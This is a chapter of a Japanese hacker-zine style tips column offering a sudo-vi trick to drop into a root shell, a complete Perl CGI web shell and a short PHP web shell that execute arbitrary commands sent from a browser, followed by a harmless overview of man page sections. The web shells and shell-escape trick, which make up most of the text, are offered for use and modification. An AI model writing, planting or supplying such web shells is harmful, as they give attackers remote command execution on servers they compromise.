x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x

--- 第5章: マメ知識 vol.1 ---

著者：Taka John Brunkhorst

x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x
x0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0xx0xXx0x


■0x01.) はじめに

　これ知っておいたらいつか役立つかもしれないというマメ知識を紹介していき
ます。


■0x02.) sudoでrootシェルになって遊ぶ

　sudoは御存じの通りroot権限で何かを実行する場合に使います。といってもこ
こでは別にvisudoがどーのこーのやsudoersがどーのこーのやらは書きません。普
段はsudo passwdみたいに使いますが、今回はsudoでrootシェルを開きます。

-----
sudo vi
[ESC] :! bash
bash~#
------

　じゃぁ後は好きなだけ遊んでください。


■0x03.) perlでシェルを作って遊ぶ

　ここではPeerlを使ってリモートシェル用のCGIを作って遊びます。こちらの方
はスクラッチからコードしなくとも優秀なスクリプトが出回っております。後は
自分のニーズにhackしてください。

　気に入っているスクリプトを紹介致します（by がま）。

-----
$ownname="http://$ENV{'SERVER_NAME'}$ENV{'SCRIPT_NAME'}";

$ENV{'PATH'} = '/bin'
. ':/usr/bin'
. ':/usr/ucb'
. ':/etc'
. ':/usr/etc'
. ':/usr/lib'
. ':/usr/local/bin'
. ':/usr/local/lib'
. ':/usr/local/sbin'
;

($dir,$cmd)=split('&',$ENV{'QUERY_STRING'});
$dir =~ s/dir=//;
$dir =~ s/%(..)/pack('c',hex($1))/ge;
$cmd =~ s/cmd=//;
$cmd =~ s/\+/ /g;
$cmd =~ s/%(..)/pack('c',hex($1))/ge;
$|=1;

print "Content-type: text/html\n\n";
print '<HTML><BODY>';
print "<PRE>\n";
chdir("$dir");
$wd=&pwd;
print "Curr Dir:$wd\n";
$cmdpr = $cmd;
$cmdpr =~ s/&/&/g;
$cmdpr =~ s/</</g;
$cmdpr =~ s/>/>/g;
print "\n<B>>$cmdpr</B>\n";
if ($cmd =~ /^cd(\s)*/ ) {
	unless (chdir($')) {
		print "cd $':not success.\n";
	}
	$dir=&pwd;
	print "Curr Dir:$dir\n";
} else {
	open(PROC,"$cmd 2>&1 |");
	while (<PROC>) {
		s/</\001/g;
		s/>/\002/g;
		s/(.)(\x08\1)+/<B>$1<\/B>/g;
		s/_\x08(.)/<U>$1<\/U>/g;
		s/o\x08\+/<S>X<\/S>/g;
		s/<\/(.)><\1>//g;
		s/&/&/g;
		s/\001/</g;
		s/\002/>/g;
		print $_;
	}
	close(PROC);
}

print "</PRE>\n";
print '<HR>';
print '<FORM ACTION="' . $ownname . '" METHOD="GET">';
print '<INPUT TYPE="hidden" NAME="dir" VALUE="' . $dir . '">';
print '<INPUT TYPE="text" NAME="cmd" SIZE=80 VALUE="' . $cmd . '">';
print '<INPUT TYPE="submit" VALUE="Send">';
print '</FORM>';
print '</BODY></HTML>';

exit;

sub pwd {
	use Cwd;
	$wd = Cwd::getcwd();
	unless ($wd) {
		$wd='/';
	}

	return $wd;
}
-----


■0x04.) PHPでシェルを作って遊ぶ

　PHPでのリモートシェルはsafe_modeで起動されていない場合に使用できます。
以下はかなりベーシックなものです。後は自由にmodしてください。

-----
<html><body>
<form action="<? echo $_SERVER[PHP_SELF]; ?>" method="POST">
<input type="text" name="cmd" value="<?echo $_POST[cmd];?>">
<input type="submit" value="send"></form>
<pre>

<?
if(isset($_POST[cmd]));
$fp = @popen ("$_POST[cmd]", "r");
	while (!feof ($fp)){
		$buffer = fgets($fp, 1024); 
		echo "$buffer";
	}
endif; 
?> 

</pre></body>
</html>
-----


■0x05.) manページの構造

　manページは御存じの通り必要不可欠です。大きいアプリケーションは当然のこ
とながらmanページがでかいです。そこでmanページの構造をしっておくと、「/」
と「n」ばかりを押しているよりより速く必要な情報をゲットすることができます。

=====================================================================
セクション | 内容
=====================================================================
1          | バイナリやシェルコマンド
---------------------------------------------------------------------
8          | システム管理関係のコマンド
---------------------------------------------------------------------
2          | システムコール
---------------------------------------------------------------------
3          | ライブラリコール
---------------------------------------------------------------------
4          | /dev/などの特別なファイル
---------------------------------------------------------------------
5          | ファイルフォーマットなど
---------------------------------------------------------------------
6          | ゲーム関係
---------------------------------------------------------------------
7          | マクロパッケージなど
---------------------------------------------------------------------
9          | カーネルルーチン
---------------------------------------------------------------------
N          | Tcl/TKコマンド
=====================================================================

●manページフォーマット

=====================================================================
Name          | その名の通り「名前」です。よくそれについての説明があります。
---------------------------------------------------------------------
Synoposis     | syntaxなどの説明
---------------------------------------------------------------------
Description   | そのアプリケーションなどの説明があります
---------------------------------------------------------------------
Options       | オプション
---------------------------------------------------------------------
Return Values | 自分はあまり見掛けませんが、ファンクションリターンバリューが記述されているようです。
---------------------------------------------------------------------
See also      | それに関しているmanページ、まはconfなどへのmanページへのリンクがあります
---------------------------------------------------------------------
Bugs          | 現在発覚しているバグなどがリストされています
---------------------------------------------------------------------
Files         | 設定ファイル（confファイル）など、そのアプリケーションに関連しているファイルが書かれてあります。
---------------------------------------------------------------------
Copying       | ライセンス
---------------------------------------------------------------------
Authors       | メインデベロッパ又はリリースした人など
=====================================================================

●おまけ

　man :num: app で特定のセクションだけを表示することができます。:num:にはセクションナンバーを入れてください。

